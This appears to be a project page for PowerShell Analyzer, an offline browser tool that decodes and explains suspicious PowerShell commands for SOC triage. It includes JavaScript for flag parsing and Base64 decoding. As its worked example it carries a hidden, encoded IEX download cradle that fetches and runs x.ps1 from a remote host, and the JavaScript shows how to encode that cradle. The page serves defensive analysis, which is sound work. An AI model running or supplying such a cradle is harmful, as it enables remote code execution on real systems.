PowerShell Analyzer
Paste a PowerShell command, get a plain-English breakdown for triage
Built into it
- Execution-flag and Base64 parser
- 34-entry LOLBin database
- Plain-English breakdown formatter
Problem
Suspicious PowerShell shows up in alerts constantly. The standard analyst move — paste the command into a sandbox or sanitizer — runs into a wall in environments with strict data-handling controls, where pasting an alert payload into a third-party service isn’t allowed. Junior analysts then either skip the analysis (and lose context) or wait for a senior to translate (and stall the queue).
Approach
PowerShell Analyzer is a single-file HTML tool that runs entirely in the browser. No network calls, no model weights. Paste a command and it parses execution flags, decodes Base64 payloads — including the UTF-16LE encoding PowerShell actually uses for -EncodedCommand — identifies LOLBins from a curated database, and outputs a step-by-step breakdown.
Input:
powershell -NoP -W hidden -Enc <base64 string>
Breakdown:
-NoProfile Skip user PowerShell profile load
-WindowStyle hidden Hide the window from the user
-EncodedCommand Decoded payload (UTF-16LE):
IEX (New-Object Net.WebClient).DownloadString(
'http://10.0.0.5/x.ps1'
)
LOLBin chain:
PowerShell → IEX → WebClient.DownloadString
Pattern: remote script load and inline execution
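The parse, decode and LOLBin steps walked through above, as an added JavaScript example (not the project's own code): the switch table, the two-entry LOLBin list and the sample command are constructed for this illustration, and atob, btoa and TextDecoder are assumed available as in a browser or Node 16+.

```javascript
// Switches a triage parser must recognise (subset); short forms as powershell.exe accepts them.
const FLAGS = [
  { name: 'NoProfile',       short: ['nop'],            value: false, meaning: 'Skip user PowerShell profile load' },
  { name: 'WindowStyle',     short: ['w'],              value: true,  meaning: 'Set console window style (hidden = not shown to the user)' },
  { name: 'ExecutionPolicy', short: ['ex', 'ep'],       value: true,  meaning: 'Override script execution policy for this process' },
  { name: 'EncodedCommand',  short: ['e', 'ec', 'enc'], value: true,  meaning: 'Run a Base64-encoded (UTF-16LE) command' },
];
// Constructed two-entry LOLBin table; the real tool ships a 34-entry database.
const LOLBINS = [
  { name: 'IEX',                      re: /\bIEX\b|Invoke-Expression/i },
  { name: 'WebClient.DownloadString', re: /Net\.WebClient\b[\s\S]*DownloadString/i },
];
// '-NoP', '-nop', '/NoProfile' all resolve to NoProfile; non-switch tokens and unknown names give null.
function resolveFlag(token) {
  const m = /^[-/](\w+)$/.exec(token), t = m && m[1].toLowerCase(); if (!t) return null;
  return FLAGS.find(f => f.short.includes(t) ||
    (f.name.toLowerCase().startsWith(t) && t.startsWith(f.short[0]))) || null;
}
// Base64 -> raw bytes -> UTF-16LE text (the encoding -EncodedCommand actually uses).
function decodeEncodedCommand(b64) {
  const bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));
  return new TextDecoder('utf-16le').decode(bytes);
}
// Inverse of the above; used here only to build the constructed sample input.
function encodeCommand(script) {
  const bytes = new Uint8Array(script.length * 2);
  for (let i = 0; i < script.length; i++) {
    const c = script.charCodeAt(i);              // UTF-16 code unit, emitted little-endian
    bytes[2 * i] = c & 0xff; bytes[2 * i + 1] = c >> 8;
  }
  return btoa(String.fromCharCode(...bytes));
}
// Returns { flags: [{flag, value, meaning}], payload: decoded script or null, chain: [...] }.
function analyze(cmdline) {
  const tokens = cmdline.trim().split(/\s+/);   // tokens[0] is the binary name
  const flags = []; let payload = null;
  for (let i = 1; i < tokens.length; i++) {
    const f = resolveFlag(tokens[i]);
    if (!f) continue;
    const value = f.value ? tokens[++i] : undefined;
    flags.push({ flag: '-' + f.name, value, meaning: f.meaning });
    if (f.name === 'EncodedCommand' && value) payload = decodeEncodedCommand(value);
  }
  const body = payload ?? cmdline;               // scan the decoded payload when there is one
  const chain = ['PowerShell', ...LOLBINS.filter(l => l.re.test(body)).map(l => l.name)];
  return { flags, payload, chain };
}
// Constructed sample input: the page's example, re-encoded the way PowerShell expects it.
const SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/x.ps1')";
const SAMPLE_CMD = 'powershell -NoP -W hidden -Enc ' + encodeCommand(SAMPLE_SCRIPT);
```

Calling analyze(SAMPLE_CMD) yields the resolved flags, the decoded script and the chain PowerShell > IEX > WebClient.DownloadString shown in the breakdown above; a malformed Base64 value makes atob throw, which a real tool should catch and report as "undecodable".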
Outcome
A junior analyst who used to wait twenty minutes for a senior to translate a -EncodedCommand blob now gets a structured breakdown in seconds. The decoded output drops directly into the investigation note — same format every time, auditable, and the alert payload never left the analyst’s machine.
What’s next
Obfuscation-detection heuristics are the natural next layer: string concatenation patterns, character-level evasion, format-string tricks. The current parser handles common cases cleanly; the long tail of evasion variants is where the real work is.
Other projects
- BASTION: KQL investigation toolkit that ends the rebuild-from-scratch loop (HTML, JavaScript, Python, FastAPI; active)
- CARL: Offline SOC knowledge base that captures what lives in analysts' heads (HTML, JavaScript, Python, FastAPI; active)
- KQL Sentinel Lab: Synthetic Sentinel environment for analysts to practice on real attack data (HTML, JavaScript, Python, FastAPI; active)